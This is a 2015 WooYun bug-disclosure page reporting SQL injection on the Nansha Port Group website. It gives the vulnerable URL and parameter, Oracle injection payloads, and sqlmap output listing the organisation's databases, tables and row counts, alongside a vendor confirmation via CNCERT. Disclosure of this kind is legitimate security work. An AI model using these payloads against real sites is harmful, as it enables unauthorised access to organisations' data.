当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130545

漏洞标题:南沙港务集团主站SQL注入漏洞

相关厂商:南沙港务集团

漏洞作者: 李叫兽就四李叫兽

提交时间:2015-08-03 07:37

修复时间:2015-09-20 09:56

公开时间:2015-09-20 09:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

南沙港务集团漏洞

详细说明:

http://www.gnict.com/cn/news/news_list.jsp?ID=4682

注入点
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=4682' AND 4872=4872 AND 'fjUy'='fjUy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ID=4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'vPXF'='vPXF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ID=4682' AND 8737=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'aSVx'='aSVx
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=4682' AND 4872=4872 AND 'fjUy'='fjUy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ID=4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'vPXF'='vPXF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ID=4682' AND 8737=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'aSVx'='aSVx
---
web application technology: JSP
back-end DBMS: Oracle
available databases [11]:
[*] CTBIS
[*] CTBOS
[*] CTCOM
[*] CTPLAN
[*] CTWEB
[*] CTXSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=4682' AND 4872=4872 AND 'fjUy'='fjUy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ID=4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'vPXF'='vPXF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ID=4682' AND 8737=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'aSVx'='aSVx
---
web application technology: JSP
back-end DBMS: Oracle
Database: WKSYS
[5 tables]
+--------------------------------+
| WK$CHARSET |
| WK$CRAWLER_CONFIG_DEFAULT |
| WK$LANG |
| WK$MIMETYPES |
| WK$SYS_CONFIG |
+--------------------------------+
Database: CTBOS
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: CTWEB
[36 tables]
+--------------------------------+
| CNTR_CORP_COD_TRAN |
| CONTRACT_IE_DOC_WEB |
| C_TRUCK_CLASS_TIM |
| GG_INFO |
| GSGG |
| HANGYE_INFO |
| HYQXZD |
| IE_CON_CNTR_WEB |
| IE_CON_CRG_WEB |
| JSCYZD |
| JSQXZD |
| JSZD |
| MEMBER |
| MEMBER_CUST_COD |
| MEMBER_CUST_COD1 |
| NEWS |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| QUEST_SL_TEMP_EXPLAIN1 |
| QXZD |
| RAS_DETAIL |
| RAS_ENROLL |
| SCJB |
| SQLEXPERT_PLAN1 |
| STATION_COD |
| S_CODE_I |
| S_LOG |
| TOAD_PLAN_TABLE |
| TRAIN_CNTR_WEB |
| TRAIN_WEB |
| T_SHIP_CNTR_NUM10 |
| T_TRAIN_CNTR_STA |
| T_TRAIN_CNTR_STA2 |
+--------------------------------+
Database: SYS
[12 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$CWMTOECM |
| AW$EXPRESS |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
+--------------------------------+
Database: CTCOM
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: MDSYS
[10 tables]
+--------------------------------+
| CS_SRS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_ANGLE_UNITS |
| SDO_AREA_UNITS |
| SDO_DATUMS |
| SDO_DIST_UNITS |
| SDO_ELLIPSOIDS |
| SDO_PROJECTIONS |
| USER_CS_SRS |
| USER_TRANSFORM_MAP |
+--------------------------------+
Database: CTBIS
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: CTXSYS
[1 table]
+--------------------------------+
| DR$POLICY_TAB |
+--------------------------------+
Database: WKSYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WK$CHARSET | 57 |
| WK$CRAWLER_CONFIG_DEFAULT | 38 |
| WK$MIMETYPES | 35 |
| WK$LANG | 14 |
| WK$SYS_CONFIG | 1 |
+---------------------------+---------+
Database: CTWEB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| RAS_DETAIL | 114178 |
| HYQXZD | 3527 |
| T_SHIP_CNTR_NUM10 | 3110 |
| RAS_ENROLL | 470 |
| MEMBER_CUST_COD | 463 |
| NEWS | 440 |
| MEMBER_CUST_COD1 | 406 |
| SQLEXPERT_PLAN1 | 255 |
| T_TRAIN_CNTR_STA | 192 |
| T_TRAIN_CNTR_STA2 | 192 |
| MEMBER | 114 |
| QXZD | 33 |
| TOAD_PLAN_TABLE | 30 |
| GSGG | 29 |
| PBCATEDT | 21 |
| PBCATFMT | 20 |
| TRAIN_CNTR_WEB | 13 |
| S_CODE_I | 10 |
| JSCYZD | 7 |
| JSZD | 7 |
| TRAIN_WEB | 7 |
| IE_CON_CNTR_WEB | 6 |
| CNTR_CORP_COD_TRAN | 5 |
| C_TRUCK_CLASS_TIM | 4 |
| GG_INFO | 3 |
| STATION_COD | 3 |
| CONTRACT_IE_DOC_WEB | 2 |
| IE_CON_CRG_WEB | 2 |
| HANGYE_INFO | 1 |
| SCJB | 1 |
+---------------------------+---------+
Database: MDSYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| CS_SRS | 1000 |
| SDO_DATUMS | 118 |
| SDO_DIST_UNITS | 54 |
| SDO_AREA_UNITS | 48 |
| SDO_ELLIPSOIDS | 47 |
| SDO_PROJECTIONS | 42 |
| SDO_ANGLE_UNITS | 12 |
+---------------------------+---------+
Database: SYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| STMT_AUDIT_OPTION_MAP | 167 |
| SYSTEM_PRIVILEGE_MAP | 157 |
| AUDIT_ACTIONS | 144 |
| TABLE_PRIVILEGE_MAP | 23 |
| "DUAL" | 1 |
| AW$CWMTOECM | 1 |
| AW$EXPRESS | 1 |
+---------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=4682' AND 4872=4872 AND 'fjUy'='fjUy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ID=4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'vPXF'='vPXF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ID=4682' AND 8737=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'aSVx'='aSVx
---
web application technology: JSP
back-end DBMS: Oracle
都是企业的敏感信息,求个20rank,19也行。

漏洞证明:

看说明把

修复方案:

过滤下

版权声明:转载请注明来源 李叫兽就四李叫兽@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-06 09:55

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广东分中心,由广东分中心后续协调网站管理单位处置。

最新状态:

暂无